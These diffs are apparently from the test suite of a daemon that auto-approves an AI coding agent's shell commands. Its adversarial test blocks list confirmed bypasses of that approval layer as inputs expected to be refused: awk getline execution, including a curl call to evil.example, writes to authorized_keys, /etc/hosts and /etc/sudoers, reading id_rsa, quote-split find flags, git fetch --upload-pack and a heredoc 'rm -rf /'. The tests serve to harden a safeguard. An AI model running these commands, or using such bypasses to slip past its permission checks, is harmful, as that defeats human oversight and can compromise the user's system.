@@ -187,13 +187,14 @@ const FLAG_POLICIES: readonly FlagPolicy[] = [
     // quiet/verbose. Absent, and therefore vetoed: -f (force / discard),
     // -D (force-delete), -n (--no-verify on commit), -B (force-create).
     //
-    // `c` is listed but currently DEAD (#962). `shell-safety.ts`'s
-    // `EXEC_SCOPED_VETOES` refuses any git segment carrying a standalone `-c`
-    // — it exists to stop `git -c core.hooksPath=… commit`, and cannot tell
-    // that from `git switch -c newbranch`, so it blocks both. Keeping the
-    // letter here documents the intent; #962 is the position-scoped fix that
-    // would make it real. Do not read its presence as "git switch -c is
-    // auto-approved" — it is not.
+    // `c` is now LIVE (#962, fixed): `git switch -c newbranch` and
+    // `git commit -c abc123` reach this list and are approved through it.
+    // `shell-safety.ts`'s `hasExecPrimitive` special-cases git with a
+    // position-scoped token walk (`gitSubcommandIndex`) instead of the old
+    // presence-only `EXEC_SCOPED_VETOES` entry: a `-c` BEFORE the subcommand
+    // (`git -c core.hooksPath=… commit`) is still refused there, before this
+    // list is ever consulted; a `-c` at or after the subcommand falls through
+    // to here, where `c` being on the safe list finally means what it says.
     family: /^git\b/,
     safeShortFlags: 'amAubcqv',
     dangerousLongFlags: [

--- a/packages/daemon/tests/auto-approve/auto-approve-service.test.ts
+++ b/packages/daemon/tests/auto-approve/auto-approve-service.test.ts
@@ -7,6 +7,8 @@ import {
   normalisePermissionSuggestion,
   parseDecision,
 } from '../../src/auto-approve/auto-approve-service.ts';
+import { matchAllowPattern } from '../../src/auto-approve/pattern-matcher.ts';
+import { matchGroups } from '../../src/auto-approve/permission-groups.ts';
 import type { AutoApproveConfig } from '../../src/auto-approve/types.ts';
 import { applyEnvOverrides, loadConfig } from '../../src/config/config.ts';
 
@@ -737,6 +739,95 @@ describe('AutoApproveService - evaluateDeterministic (#1024)', () => {
     expect(viaEvaluate.decision === 'deny' ? viaEvaluate.denySource : undefined).toEqual(
       direct?.decision === 'deny-covered' ? direct.denySource : undefined,
     );
+  });
+});
+
+// ---------------------------------------------------------------------------
+// evaluateDeterministic composed pass (#1057 phase 3 commit 1) -- the union
+// of allow ∪ approve_groups, tried only when both single-source passes miss.
+// ---------------------------------------------------------------------------
+
+describe('AutoApproveService - evaluateDeterministic composed allow+group coverage', () => {
+  function detService(over: Partial<AutoApproveConfig>): AutoApproveService {
+    return new AutoApproveService(makeConfig({ base_url: 'http://10.255.255.1', ...over }), logFn);
+  }
+
+  test('ssh <alias> (allow) piped into head (read-only group) approves with composed reasoning', () => {
+    const service = detService({ allow: ['ssh hallu'], approve_groups: ['read-only'] });
+    const cmd = 'ssh hallu nvidia-smi | head -2';
+    const result = service.evaluateDeterministic('Bash', { command: cmd });
+    expect(result?.decision).toBe('approve');
+    const reasoning = result && 'reasoning' in result ? result.reasoning : '';
+    expect(reasoning).toBe('composed allow+group coverage: "ssh hallu" + "head"');
+    // Composition, not allow-widening: neither single-source matcher decides
+    // this chain on its own.
+    expect(matchAllowPattern('Bash', { command: cmd }, ['ssh hallu'])).toBeNull();
+    expect(matchGroups('Bash', { command: cmd }, ['read-only'])).toBeNull();
+  });
+
+  test('uv run (allow) piped into tail (read-only group) approves with composed reasoning', () => {
+    const service = detService({ allow: ['uv run'], approve_groups: ['read-only'] });
+    const cmd = 'uv run pytest | tail -5';
+    const result = service.evaluateDeterministic('Bash', { command: cmd });
+    expect(result?.decision).toBe('approve');
+    const reasoning = result && 'reasoning' in result ? result.reasoning : '';
+    expect(reasoning).toBe('composed allow+group coverage: "uv run" + "tail"');
+    expect(matchAllowPattern('Bash', { command: cmd }, ['uv run'])).toBeNull();
+    expect(matchGroups('Bash', { command: cmd }, ['read-only'])).toBeNull();
+  });
+
+  test('allow-only chain keeps the exact matchAllowPattern reasoning (zero churn)', () => {
+    const service = detService({ allow: ['git push'], approve_groups: ['read-only'] });
+    const result = service.evaluateDeterministic('Bash', { command: 'git push origin main' });
+    expect(result?.decision).toBe('approve');
+    const reasoning = result && 'reasoning' in result ? result.reasoning : '';
+    expect(reasoning).toBe('allow-matched pattern: "git push"');
+  });
+
+  test('group-only chain keeps the exact matchGroups reasoning (zero churn)', () => {
+    const service = detService({ allow: ['ssh hallu'], approve_groups: ['read-only'] });
+    const result = service.evaluateDeterministic('Bash', { command: 'cat notes.txt' });
+    expect(result?.decision).toBe('approve');
+    const reasoning = result && 'reasoning' in result ? result.reasoning : '';
+    expect(reasoning).toBe('approve-matched group: "read-only:cat"');
+  });
+
+  test('deny still wins over composition: a denied segment refuses the whole chain', () => {
+    const service = detService({
+      allow: ['ssh hallu'],
+      approve_groups: ['read-only'],
+      deny: ['nvidia-smi'],
+    });
+    const result = service.evaluateDeterministic('Bash', {
+      command: 'ssh hallu nvidia-smi | head -2',
+    });
+    expect(result?.decision).toBe('deny-covered');
+  });
+
+  test('deny_groups still wins over composition', () => {
+    const service = detService({
+      allow: ['ssh hallu'],
+      approve_groups: ['read-only'],
+      deny_groups: ['read-only'],
+    });
+    const result = service.evaluateDeterministic('Bash', {
+      command: 'ssh hallu nvidia-smi | head -2',
+    });
+    expect(result?.decision).toBe('deny-covered');
+  });
+
+  test('non-Bash tool never reaches the composed pass, even carrying a command-shaped field', () => {
+    const service = detService({ allow: ['ssh hallu'], approve_groups: ['read-only'] });
+    const result = service.evaluateDeterministic('SomeTool', {
+      command: 'ssh hallu nvidia-smi | head -2',
+    });
+    expect(result).toBeNull();
+  });
+
+  test('empty allow and empty approve_groups: composed pass never fires', () => {
+    const service = detService({ allow: [], approve_groups: [] });
+    const result = service.evaluateDeterministic('Bash', { command: 'git status' });
+    expect(result).toBeNull();
   });
 });
 

--- a/packages/daemon/tests/auto-approve/auto-approve-service.test.ts
+++ b/packages/daemon/tests/auto-approve/auto-approve-service.test.ts
@@ -792,6 +792,18 @@ describe('AutoApproveService - evaluateDeterministic composed allow+group covera
     expect(reasoning).toBe('approve-matched group: "read-only:cat"');
   });
 
+  test('OVERLAP config: a chain a group alone covers keeps group reasoning, not composed', () => {
+    // `cat` sits in BOTH allow and read-only, and every segment is group-covered,
+    // so matchGroups resolves the whole chain first -- the composed pass never runs.
+    // Pins that the composed block is placed AFTER the single-source passes: moving
+    // it ahead would relabel this `composed allow+group coverage: "cat" + "head"`.
+    const service = detService({ allow: ['cat'], approve_groups: ['read-only'] });
+    const result = service.evaluateDeterministic('Bash', { command: 'cat a.txt | head -1' });
+    expect(result?.decision).toBe('approve');
+    const reasoning = result && 'reasoning' in result ? result.reasoning : '';
+    expect(reasoning).toBe('approve-matched group: "read-only:cat"');
+  });
+
   test('deny still wins over composition: a denied segment refuses the whole chain', () => {
     const service = detService({
       allow: ['ssh hallu'],

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -2012,17 +2012,41 @@ describe('#1057 phase 3 commit 1: matchComposedCommand', () => {
     });
   });
 
-  describe('ADR 0026 pre-passes are gated on GROUP membership only, never allow', () => {
+  describe('ADR 0026 pre-passes never run on this path at all (#1062 C5, CONFIRMED RCE-adjacent bypass)', () => {
     test('no fs-write group: the redirect stays and hasShellControl refuses, even though allow covers python3', () => {
       expect(
         matchComposedCommand('python3 gen.py > out.txt', ['python3'], ['read-only']),
       ).toBeNull();
     });
 
-    test('fs-write active: the grant proves the target, python3 covers via allow -- correct composition', () => {
+    // Was: {allowHit: 'python3', groupHit: null} -- APPROVED, before #1062. The
+    // `fs-write` redirect-grant pre-pass used to run over the WHOLE command
+    // before per-segment judgment, deleting `> out.txt` from an ALLOW-owned
+    // segment (`python3 gen.py`) that `matchAllowPattern` alone refuses outright
+    // (`hasShellControl` sees the live, non-`/dev/null` redirect). Proven by
+    // execution as a real bypass: `python3 evil.py > out.txt && ls` approved
+    // with `python3` allow-listed for read-only use and `fs-write` merely
+    // ENABLED (not even naming `python3`). `matchComposedCommand` no longer
+    // runs the pre-pass in this path at all -- see its function doc -- so an
+    // allow-owned segment now gets exactly `matchAllowPattern`'s raw treatment,
+    // and this composition (which needs the pre-pass AND the allow prefix
+    // together) fails closed instead of approving. `fs-write` alone, with no
+    // allow entry, still gets its redirect grant via `matchGroups` (the
+    // pure-group path) -- see `permission-groups.test.ts`'s fs-write section.
+    test('fs-write active: allow-owned segment still gets no redirect grant -- fails closed (#1062 C5)', () => {
       expect(
         matchComposedCommand('python3 gen.py > out.txt', ['python3'], ['read-only', 'fs-write']),
-      ).toEqual({ allowHit: 'python3', groupHit: null });
+      ).toBeNull();
+    });
+
+    test('heredoc excision does not run here either: allow-owned heredoc body is not made invisible', () => {
+      expect(
+        matchComposedCommand(
+          'ssh hallu bash <<EOF\nrm -rf /\nEOF\nls',
+          ['ssh hallu'],
+          ['read-only'],
+        ),
+      ).toBeNull();
     });
   });
 });

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -99,7 +99,9 @@ describe('permission-groups: read-only Bash (positive)', () => {
     ['paste f1 f2', 'read-only:paste'],
     ['nl file.txt', 'read-only:nl'],
     ['rev file.txt', 'read-only:rev'],
-    ["awk '{print $1}' file.txt", 'read-only:awk'],
+    // `awk` is deliberately NOT curated (#1062 C1) -- see the adversarial
+    // block below and the `read-only` group's own comment in
+    // `permission-groups.ts`.
     ['find . -name "*.ts"', 'read-only:find'],
     // sort/tree/diff land WITH their SCOPED_VETOES `-o`/`--output` entries --
     // never bare (sort -o is the module doc's canonical write-escape example).
@@ -113,17 +115,7 @@ describe('permission-groups: read-only Bash (positive)', () => {
   }
 });
 
-describe('#1057 phase 3 commit 3: awk/find are curated, their ambiguous forms are still vetoed', () => {
-  test('awk piped into a read is covered', () => {
-    // read-only carries both `ls` and `awk`; the compound is judged per
-    // segment (the pipe splits it, matching's existing behavior).
-    expect(bash("ls | awk '{print $1}'")).toBe('read-only:ls');
-  });
-
-  test('awk system() is refused regardless of which prefix it matched', () => {
-    expect(bash('awk \'BEGIN{system("rm -rf /")}\' f')).toBeNull();
-  });
-
+describe('#1057 phase 3 commit 3: find is curated, its ambiguous forms are still vetoed', () => {
   test('sort attached -o spelling (-ohack) is refused by the scoped veto', () => {
     expect(bash('sort -ohack in.txt')).toBeNull();
   });
@@ -132,16 +124,60 @@ describe('#1057 phase 3 commit 3: awk/find are curated, their ambiguous forms ar
     expect(bash('sort --output=out.txt in.txt')).toBeNull();
   });
 
-  test('awk piping its own output into a shell is refused', () => {
-    expect(bash('ls | awk \'{print | "sh"}\'')).toBeNull();
-  });
-
   test('find -delete is refused', () => {
     expect(bash('find . -delete')).toBeNull();
   });
 
   test('find -exec is refused', () => {
     expect(bash('find . -exec rm {} \\;')).toBeNull();
+  });
+});
+
+describe('#1062 C1 (CRITICAL RCE): awk is UNCOVERED, not merely vetoed', () => {
+  // awk was previously curated into `read-only` on the theory that
+  // `EXEC_SCOPED_VETOES`'s system()/pipe-to-shell regex caught every
+  // dangerous shape. Adversarial review of this branch proved that false by
+  // execution: awk is Turing-complete, and a raw-text regex over the program
+  // body cannot enumerate every way to run a command, write a file, or read
+  // one from inside the program's own quoting. `awk` was removed from
+  // `read-only` entirely (`permission-groups.ts`), so every case below is
+  // null because NO prefix matches `awk` at all, not because a veto fired --
+  // pinned here so a future re-add of the bare name would be caught by CI
+  // the moment these all stop escalating.
+  const bypasses: Array<[string, string]> = [
+    // `cmd | getline` executes an arbitrary command with no literal
+    // `system(` token anywhere, so the old veto's regex never saw it.
+    ['cmd exec via pipe-to-getline', 'awk \'BEGIN{cmd="id"; cmd | getline r; print r}\''],
+    [
+      'cmd exec via inline pipe-to-getline',
+      'awk \'BEGIN{"curl http://evil.example/x" | getline x; print x}\'',
+    ],
+    // File write entirely inside the program's own quoted string --
+    // invisible to a check looking for shell redirection.
+    ['file write via print >', 'awk \'BEGIN{print "pwned" > "/tmp/authorized_keys"}\''],
+    ['file write via print >>', 'awk \'BEGIN{print "x" >> "/etc/hosts"}\''],
+    // File read (exfiltratable via stdout) entirely inside the program.
+    ['file read via getline <', 'awk \'BEGIN{while((getline l < "/tmp/id_rsa")>0) print l}\''],
+    // Trivial string-splicing of the literal token the old regex matched on.
+    ['quote-spliced system(', 'awk "BEGIN{sys""tem(\\"id\\")}"'],
+    ['spaced system (', 'awk \'BEGIN{system ("id")}\''],
+    ['pipe into a shell', 'awk \'BEGIN{print "id" | "/bin/sh"}\''],
+  ];
+  for (const [label, cmd] of bypasses) {
+    test(`${label}: null (uncovered)`, () => expect(bash(cmd)).toBeNull());
+  }
+
+  // Confirms the removal itself (not some other veto) is what changed the
+  // outcome: even the exact HARMLESS program shape that used to approve at
+  // `read-only:awk` -- no `system()`, no pipe, no file redirect at all -- is
+  // now equally uncovered, because no prefix named `awk` exists any more.
+  test('a harmless awk program is uncovered too (removal, not a veto)', () => {
+    expect(bash("awk '{print $1}' file.txt")).toBeNull();
+  });
+
+  test('the neighboring `ls` in a pipe stays covered on its own, but the compound is not', () => {
+    expect(bash('ls')).toBe('read-only:ls');
+    expect(bash("ls | awk '{print $1}'")).toBeNull();
   });
 });
 

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -92,10 +92,54 @@ describe('permission-groups: read-only Bash (positive)', () => {
     ['wc -l file', 'read-only:wc'],
     ['ls -la', 'read-only:ls'],
     ['jq .version package.json', 'read-only:jq'],
+    // #1057 phase 3 commit 3.
+    ['tr a-z A-Z', 'read-only:tr'],
+    ['comm f1 f2', 'read-only:comm'],
+    ['paste f1 f2', 'read-only:paste'],
+    ['nl file.txt', 'read-only:nl'],
+    ['rev file.txt', 'read-only:rev'],
+    ["awk '{print $1}' file.txt", 'read-only:awk'],
+    ['find . -name "*.ts"', 'read-only:find'],
   ];
   for (const [cmd, expected] of cases) {
     test(cmd, () => expect(bash(cmd)).toBe(expected));
   }
+});
+
+describe('#1057 phase 3 commit 3: awk/find are curated, their ambiguous forms are still vetoed', () => {
+  test('awk piped into a read is covered', () => {
+    // read-only carries both `ls` and `awk`; the compound is judged per
+    // segment (the pipe splits it, matching's existing behavior).
+    expect(bash("ls | awk '{print $1}'")).toBe('read-only:ls');
+  });
+
+  test('awk system() is refused regardless of which prefix it matched', () => {
+    expect(bash('awk \'BEGIN{system("rm -rf /")}\' f')).toBeNull();
+  });
+
+  test('awk piping its own output into a shell is refused', () => {
+    expect(bash('ls | awk \'{print | "sh"}\'')).toBeNull();
+  });
+
+  test('find -delete is refused', () => {
+    expect(bash('find . -delete')).toBeNull();
+  });
+
+  test('find -exec is refused', () => {
+    expect(bash('find . -exec rm {} \\;')).toBeNull();
+  });
+});
+
+describe('#1057 phase 3 commit 3: printf is neutral (NEUTRAL_PREFIXES)', () => {
+  test('the #996 sample: a for-loop header using printf for progress text', () => {
+    expect(
+      bash('for p in 11 14; do printf "obs #%s: " $p; gh pr checks $p 2>&1|head -1; done'),
+    ).toBe('vcs-read:gh pr checks');
+  });
+
+  test('bare printf alone is not a read (neutral-only commands match nothing)', () => {
+    expect(bash('printf "hi"')).toBeNull();
+  });
 });
 
 describe('permission-groups: vcs-read Bash (positive)', () => {
@@ -109,6 +153,7 @@ describe('permission-groups: vcs-read Bash (positive)', () => {
     ['git rev-parse --abbrev-ref HEAD', 'vcs-read:git rev-parse'],
     ['git reflog show --oneline', 'vcs-read:git reflog show'],
     ['git config --get user.email', 'vcs-read:git config --get'],
+    ['git fetch --all', 'vcs-read:git fetch'],
     ['gh pr diff 494', 'vcs-read:gh pr diff'],
     ['gh pr view 494 --json title', 'vcs-read:gh pr view'],
     ['gh run list --limit 5', 'vcs-read:gh run list'],
@@ -216,11 +261,15 @@ describe('permission-groups: adversarial (MUST fall through to LLM, never group-
     'git diff HEAD \ngit commit --allow-empty -m pwned',
     'cat README.md \nchmod 777 /etc/passwd',
     'git log \t\ngit push', // whitespace-then-newline
-    // commands intentionally excluded from the curated set
+    // `find`/`awk` are curated as of #1057 phase 3 commit 3, but their
+    // ambiguous-flag forms are still refused -- by `hasExecPrimitive`
+    // (shell-safety.ts), not by the prefix being absent.
     'find . -name x -delete',
     'find . -exec rm {} +',
-    'sort -o out.txt in.txt', // -o writes
     'awk \'{system("rm x")}\'',
+    // commands intentionally excluded from the curated set (no veto exists
+    // for the ambiguous flag, unlike `find`/`awk` above)
+    'sort -o out.txt in.txt', // -o writes
     'gh api -X POST /repos/o/r/issues', // gh api excluded entirely
     // word-boundary: must not match a longer command sharing the prefix text
     'git showoff --now',
@@ -375,10 +424,16 @@ describe('vcs-write: covered', () => {
     ['git stash pop', 'vcs-write:git stash'],
     ['git stash pop -q', 'vcs-write:git stash'],
     ['git worktree add ../x -b feature/y', 'vcs-write:git worktree add'],
+    // #1057 phase 3 commit 3.
+    ['git pull -q', 'vcs-write:git pull'],
   ];
   for (const [cmd, expected] of cases) {
     test(cmd, () => expect(bash(cmd, WRITE_GROUPS)).toBe(expected));
   }
+
+  test('git pull needs vcs-write requested -- read groups alone do not cover it', () => {
+    expect(bash('git pull', ALL)).toBeNull();
+  });
 });
 
 describe('vcs-write: MUST NOT cover', () => {

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -101,6 +101,12 @@ describe('permission-groups: read-only Bash (positive)', () => {
     ['rev file.txt', 'read-only:rev'],
     ["awk '{print $1}' file.txt", 'read-only:awk'],
     ['find . -name "*.ts"', 'read-only:find'],
+    // sort/tree/diff land WITH their SCOPED_VETOES `-o`/`--output` entries --
+    // never bare (sort -o is the module doc's canonical write-escape example).
+    ['ls | sort', 'read-only:ls'],
+    ['sort -u f.txt', 'read-only:sort'],
+    ['diff a.txt b.txt', 'read-only:diff'],
+    ['tree -L 2', 'read-only:tree'],
   ];
   for (const [cmd, expected] of cases) {
     test(cmd, () => expect(bash(cmd)).toBe(expected));
@@ -116,6 +122,14 @@ describe('#1057 phase 3 commit 3: awk/find are curated, their ambiguous forms ar
 
   test('awk system() is refused regardless of which prefix it matched', () => {
     expect(bash('awk \'BEGIN{system("rm -rf /")}\' f')).toBeNull();
+  });
+
+  test('sort attached -o spelling (-ohack) is refused by the scoped veto', () => {
+    expect(bash('sort -ohack in.txt')).toBeNull();
+  });
+
+  test('sort --output long form is refused', () => {
+    expect(bash('sort --output=out.txt in.txt')).toBeNull();
   });
 
   test('awk piping its own output into a shell is refused', () => {

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -181,6 +181,113 @@ describe('#1062 C1 (CRITICAL RCE): awk is UNCOVERED, not merely vetoed', () => {
   });
 });
 
+describe('#1062 C2: sort/tree -o bundled into a leading short-flag cluster', () => {
+  // Neither GNU nor BSD `sort` has any OTHER short flag containing the
+  // letter `o` (`-b -c -C -d -f -g -i -k -m -M -n -R -r -S -s -t -T -u -V -z
+  // -h`), and `tree` likewise has none besides `-o` itself. So `o` bundled
+  // ANYWHERE into a leading short-flag cluster can only mean the write flag
+  // is present -- the previous `/(^|\s)(-o|--output)/` matched `-o` only at
+  // a word boundary and missed every bundled spelling (CONFIRMED bypass,
+  // proven: `sort -ro out.txt in.txt` and `sort -uo ~/.ssh/authorized_keys
+  // pub.txt` both approved before this fix).
+  const bypasses: Array<[string, string]> = [
+    ['sort -ro', 'sort -ro out.txt in.txt'],
+    ['sort -uo (sensitive target)', 'sort -uo /Users/yahya/.ssh/authorized_keys pub.txt'],
+    ['sort -rno (sensitive target)', 'sort -rno /etc/sudoers in.txt'],
+    ['tree -no', 'tree -no out.txt'],
+    ['tree -nio', 'tree -nio t2'],
+  ];
+  for (const [label, cmd] of bypasses) {
+    test(`${label}: null`, () => expect(bash(cmd)).toBeNull());
+  }
+
+  // Positive controls: none of these bundle the letter `o`, so the scoped
+  // veto must not fire on them.
+  test('sort -u f.txt is still covered', () =>
+    expect(bash('sort -u f.txt')).toBe('read-only:sort'));
+  test('sort -rn f is still covered', () => expect(bash('sort -rn f')).toBe('read-only:sort'));
+  test('tree -L 2 is still covered', () => expect(bash('tree -L 2')).toBe('read-only:tree'));
+  test('tree -a is still covered', () => expect(bash('tree -a')).toBe('read-only:tree'));
+});
+
+describe('#1062 C3: find write/exec primitives that a quote splits past the raw-text check', () => {
+  // `EXEC_PRIMITIVE_TOKEN` (shell-safety.ts) vetoes these primitives on RAW
+  // segment text, consulted unconditionally by `matchCoveredCommand`. But
+  // that check runs against the STILL-QUOTED text, so a quote embedded
+  // inside the flag spelling (`-fprin"t"`) defeats the raw-text regex
+  // entirely, and (before this fix) `MUTATION_TOKEN` -- the quote-NORMALIZED
+  // check `readSegmentVeto` re-runs via `shellWords` -- did not list these
+  // spellings either, so nothing caught the unquoted form (CONFIRMED
+  // bypass).
+  const bypasses: Array<[string, string]> = [
+    ['-fprint (quote-split)', 'find . -fprin"t" /tmp/x'],
+    ['-fprintf (quote-split)', "find . -fprintf /tmp/x '%p'"],
+    [
+      '-fprintf (quote-split, sensitive target)',
+      'find . -fprint"f" /Users/yahya/.ssh/authorized_keys \'%p\'',
+    ],
+    ['-fls (quote-split)', 'find . -f"ls" /tmp/x'],
+    ['-okdir (quote-split)', 'find . -okd"ir" rm {} ;'],
+  ];
+  for (const [label, cmd] of bypasses) {
+    test(`${label}: null`, () => expect(bash(cmd)).toBeNull());
+  }
+
+  test('positive control: plain find stays covered', () => {
+    expect(bash('find . -name "*.ts"')).toBe('read-only:find');
+    expect(bash('find . -type f')).toBe('read-only:find');
+  });
+});
+
+describe('#1062 C4 (CRITICAL RCE): git remote-exec flags on git fetch (vcs-read)', () => {
+  // `git fetch --upload-pack=/tmp/evil.sh <repo>` runs `/tmp/evil.sh`
+  // LOCALLY in place of the real `git-upload-pack` on the remote end --
+  // proven by execution. `--receive-pack` is the identical primitive for
+  // the push/receive side; `--exec` is `git fetch`'s own alias for
+  // `--upload-pack`. `git fetch` sits in `vcs-read` with no `segmentVeto` of
+  // its own, so before this fix nothing on the read side refused it
+  // (CONFIRMED bypass; the write-side `vcs-write` group already refused the
+  // `git pull` spelling via `write-flag-safety.ts`'s `dangerousLongFlags` --
+  // see the positive control below).
+  const STRICT = ['read-only', 'vcs-read', 'build-test'];
+  const bypasses: Array<[string, string]> = [
+    ['--upload-pack=', 'git fetch --upload-pack=/tmp/evil.sh /tmp/repo'],
+    ['--upload-pack (space-separated)', 'git fetch --upload-pack /tmp/evil.sh /tmp/repo'],
+    ['--upload-pack="..."', 'git fetch --upload-pack="/tmp/evil.sh" /tmp/repo'],
+    ['--upload-pack= after a remote URL', 'git fetch ssh://h/r --upload-pack=/tmp/e'],
+    ['--exec=', 'git fetch --exec=/tmp/evil origin'],
+    ['--receive-pack=', 'git fetch --receive-pack=x r'],
+  ];
+  for (const [label, cmd] of bypasses) {
+    test(`${label}: null`, () => expect(matchGroups('Bash', { command: cmd }, STRICT)).toBeNull());
+  }
+
+  test('positive controls: ordinary git fetch stays covered', () => {
+    const bash2 = (cmd: string) => matchGroups('Bash', { command: cmd }, STRICT);
+    expect(bash2('git fetch --all')).toBe('vcs-read:git fetch');
+    expect(bash2('git fetch origin main')).toBe('vcs-read:git fetch');
+    expect(bash2('git fetch -q')).toBe('vcs-read:git fetch');
+  });
+
+  test('git pull --upload-pack=... was already refused at vcs-write (write-flag-safety.ts), unaffected by this change', () => {
+    const TRUSTED = [
+      'read-only',
+      'vcs-read',
+      'build-test',
+      'fs-write',
+      'scratch',
+      'vcs-write',
+      'artifact-clean',
+    ];
+    expect(
+      matchGroups('Bash', { command: 'git pull --upload-pack=/tmp/evil.sh /tmp/repo' }, TRUSTED),
+    ).toBeNull();
+    expect(matchGroups('Bash', { command: 'git pull origin main' }, TRUSTED)).toBe(
+      'vcs-write:git pull',
+    );
+  });
+});
+
 describe('#1057 phase 3 commit 3: printf is neutral (NEUTRAL_PREFIXES)', () => {
   test('the #996 sample: a for-loop header using printf for progress text', () => {
     expect(

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -1,8 +1,10 @@
 import { describe, expect, test } from 'bun:test';
+import { matchAllowPattern } from '../../src/auto-approve/pattern-matcher.ts';
 import {
   BUILTIN_GROUPS,
   isKnownGroup,
   knownGroupNames,
+  matchComposedCommand,
   matchGroups,
   matchGroupsBroad,
   matchReadOnlyCommand,
@@ -1677,5 +1679,137 @@ describe('read-only utilities added after the live-session measurement', () => {
 
   test('the mutating Spotlight sibling is deliberately absent', () => {
     expect(bash('mdutil -E /')).toBeNull();
+  });
+});
+
+/**
+ * #1057 phase 3, commit 1: `matchComposedCommand` runs ONE `matchCoveredCommand`
+ * walk over the UNION of the user's own `allow` command-prefixes and the
+ * enabled groups' prefixes, so a compound chain whose segments are covered
+ * only by the union of the two -- neither `matchAllowPattern` nor `matchGroups`
+ * alone -- is approved instead of falling through to the LLM.
+ */
+describe('#1057 phase 3 commit 1: matchComposedCommand', () => {
+  describe('covered: union-only chains that neither single source covers alone', () => {
+    test('ssh <alias> (allow) piped into head (read-only group)', () => {
+      const cmd = 'ssh hallu nvidia-smi | head -2';
+      expect(matchComposedCommand(cmd, ['ssh hallu'], ['read-only'])).toEqual({
+        allowHit: 'ssh hallu',
+        groupHit: 'head',
+      });
+      // Pin the premise: neither single-source matcher can decide this alone.
+      expect(matchAllowPattern('Bash', { command: cmd }, ['ssh hallu'])).toBeNull();
+      expect(matchGroups('Bash', { command: cmd }, ['read-only'])).toBeNull();
+    });
+
+    test('uv run (allow) piped into tail (read-only group)', () => {
+      const cmd = 'uv run pytest | tail -5';
+      expect(matchComposedCommand(cmd, ['uv run'], ['read-only'])).toEqual({
+        allowHit: 'uv run',
+        groupHit: 'tail',
+      });
+      expect(matchAllowPattern('Bash', { command: cmd }, ['uv run'])).toBeNull();
+      expect(matchGroups('Bash', { command: cmd }, ['read-only'])).toBeNull();
+    });
+  });
+
+  describe('single-source chains: matchComposedCommand agrees, adds nothing new', () => {
+    test('allow-only chain: composed result names only the allow hit', () => {
+      const result = matchComposedCommand('git push origin main', ['git push'], ['read-only']);
+      expect(result).toEqual({ allowHit: 'git push', groupHit: null });
+    });
+
+    test('group-only chain: composed result names only the group hit', () => {
+      const result = matchComposedCommand('cat notes.txt', ['ssh hallu'], ['read-only']);
+      expect(result).toEqual({ allowHit: null, groupHit: 'cat' });
+    });
+  });
+
+  describe('exec-primitive still binds a matched segment, allow-owned or not', () => {
+    test('find -exec: an allow-owned "find" prefix does not spell out the primitive', () => {
+      // `matchCoveredCommand` applies its exec-primitive check to EVERY matched
+      // segment unconditionally, after the owner dispatch -- allow-owned matches
+      // are not exempt just because the allow path adds no group veto.
+      expect(
+        matchComposedCommand('find . -exec rm -rf {} + | head -1', ['find'], ['read-only']),
+      ).toBeNull();
+    });
+
+    test('--exec flag on an allow-owned "uv run" prefix', () => {
+      expect(
+        matchComposedCommand(
+          "uv run x --exec sh -c 'rm -rf /' | head -1",
+          ['uv run'],
+          ['read-only'],
+        ),
+      ).toBeNull();
+    });
+
+    test('spelling the primitive out in the allow entry itself still works', () => {
+      // Mirrors matchAllowPattern's own documented exception: an entry that
+      // spells the primitive out means the user saw and approved it.
+      expect(
+        matchComposedCommand(
+          'find . -exec echo {} \\; | head -1',
+          ['find . -exec echo'],
+          ['read-only'],
+        ),
+      ).toEqual({ allowHit: 'find . -exec echo', groupHit: 'head' });
+    });
+  });
+
+  test('a group-vetoed segment is NOT rescued by an allow prefix that does not cover it', () => {
+    // The bad-script `sed -i .../e` segment is refused by fs-write's own
+    // `sedScriptShapeVeto`; `allow` here covers an unrelated command ("ls"),
+    // so no owner of the "sed -i" prefix passes and the whole chain stays null.
+    expect(
+      matchComposedCommand("sed -i 's/x/y/e' f && head -1 f", ['ls'], ['fs-write', 'read-only']),
+    ).toBeNull();
+  });
+
+  test('a tool-name-shaped allow entry never leaks into command matching (looksLikeToolName filter)', () => {
+    // Without the filter, "WebFetch" would be treated as a literal Bash
+    // command-prefix and would match the segment below by pure text luck.
+    expect(
+      matchComposedCommand('WebFetch something | head -1', ['WebFetch'], ['read-only']),
+    ).toBeNull();
+  });
+
+  describe('degenerate inputs: composition degrades to single-source behavior', () => {
+    test('empty groups: covered iff matchAllowPattern alone covers it', () => {
+      const allow = ['git commit', 'git status'];
+      for (const cmd of ['git commit -m x', 'git status', 'rm -rf /', 'git push origin main']) {
+        const composed = matchComposedCommand(cmd, allow, []);
+        const direct = matchAllowPattern('Bash', { command: cmd }, allow);
+        expect(composed !== null).toBe(direct !== null);
+        if (composed !== null) expect(composed.allowHit).toBe(direct);
+      }
+    });
+
+    test('empty allow: covered iff matchGroups alone covers it', () => {
+      for (const cmd of ['cat notes.txt', 'git push origin main', 'head -5 f', 'rm -rf /']) {
+        const composed = matchComposedCommand(cmd, [], ['read-only']);
+        const direct = matchGroups('Bash', { command: cmd }, ['read-only']);
+        expect(composed !== null).toBe(direct !== null);
+      }
+    });
+
+    test('both empty: never covers anything', () => {
+      expect(matchComposedCommand('git status', [], [])).toBeNull();
+    });
+  });
+
+  describe('ADR 0026 pre-passes are gated on GROUP membership only, never allow', () => {
+    test('no fs-write group: the redirect stays and hasShellControl refuses, even though allow covers python3', () => {
+      expect(
+        matchComposedCommand('python3 gen.py > out.txt', ['python3'], ['read-only']),
+      ).toBeNull();
+    });
+
+    test('fs-write active: the grant proves the target, python3 covers via allow -- correct composition', () => {
+      expect(
+        matchComposedCommand('python3 gen.py > out.txt', ['python3'], ['read-only', 'fs-write']),
+      ).toEqual({ allowHit: 'python3', groupHit: null });
+    });
   });
 });

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
